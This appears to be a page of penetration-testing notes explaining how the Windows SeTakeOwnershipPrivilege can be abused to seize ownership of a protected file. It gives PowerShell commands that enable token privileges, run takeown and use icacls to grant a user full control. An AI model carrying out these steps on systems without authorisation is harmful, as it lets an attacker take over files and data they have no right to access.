SeTakeOwnershipPrivilege

About

SeTakeOwnershipPrivilege allows a user to assume ownership of any "securable object", including Active Directory objects, NTFS files and folders, printers, registry keys, services, and processes. This privilege grants WRITE_OWNER permissions on an object, enabling the user to modify its ownership within the security descriptor. By default, administrators possess this privilege. While it is uncommon for a standard user account to have this privilege, it may be assigned to service accounts responsible for tasks such as running backup jobs and managing VSS snapshots.

Enable Privilege

For this we would use this script: [LINK]

PS C:\> Import-Module .\Enable-Privilege.ps1
PS C:\> .\EnableAllTokenPrivs.ps1

Accessing sensible file

Checking directory ownership

PS C:\> cmd /c dir /q 'C:\Share'

Taking ownership

PS C:\> takeown /f 'C:\Shares\file.txt'

Confirming Ownership Changed

PS C:\> Get-ChildItem -Path 'C:\Share\file.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

Modifying File's ACL

PS C:\> icacls 'C:\Share\file.txt' /grant venator17:F

PreviousSeDebugPrivilege NextMISC

Last updated 20 days ago